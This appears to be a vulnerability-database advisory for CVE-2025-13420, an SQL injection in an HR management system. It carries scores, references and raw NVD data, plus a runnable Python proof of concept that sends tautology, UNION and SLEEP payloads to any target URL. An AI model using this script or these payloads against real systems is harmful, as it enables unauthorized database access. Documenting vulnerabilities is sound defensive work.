CVE-2025-13420

Description

A weakness has been identified in itsourcecode Human Resource Management System 1.0. This issue affects some unknown processing of the file /src/store/EventStore.php. This manipulation of the argument eventSubject causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:human_resource_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Human Resource Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13420 SQL Injection PoC
# Target: itsourcecode Human Resource Management System 1.0
# File: /src/store/EventStore.php
# Parameter: eventSubject

def exploit_sqli(target_url, payload):
    """
    SQL Injection exploit for CVE-2025-13420
    payload examples:
    - Basic: ' OR '1'='1
    - Union-based: ' UNION SELECT NULL,version(),user()--
    - Boolean-based: ' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)='1
    """
    endpoint = f"{target_url}/src/store/EventStore.php"
    
    # Malicious payload in eventSubject parameter
    data = {
        'eventSubject': payload
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("[*] CVE-2025-13420 SQL Injection Test")
    print("[*] Target:", target)
    
    # Test with basic payload
    payloads = [
        "' OR '1'='1",
        "' UNION SELECT NULL,version(),user()--",
        "' AND SLEEP(5)--"
    ]
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {payload}")
        result = exploit_sqli(target, payload)
        if result:
            print(f"[+] Payload executed, check response for data extraction")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13420
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13420
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13420/
[4] VulDB https://vuldb.com/cve/CVE-2025-13420
[5] https://github.com/f14g-orz/CVE/issues/8
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332942
[8] https://vuldb.com/?id.332942
[9] https://vuldb.com/?submit.695952
[10] https://github.com/f14g-orz/CVE/issues/8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13420", "sourceIdentifier": "[email protected]", "published": "2025-11-19T23:15:48.553", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode Human Resource Management System 1.0. This issue affects some unknown processing of the file /src/store/EventStore.php. This manipulation of the argument eventSubject causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:human_resource_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "594C0C24-51CB-4FD9-B255-0A230A506FFE"}]}]}], "references": [{"url": "https://github.com/f14g-orz/CVE/issues/8", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332942", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332942", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.695952", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/f14g-orz/CVE/issues/8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}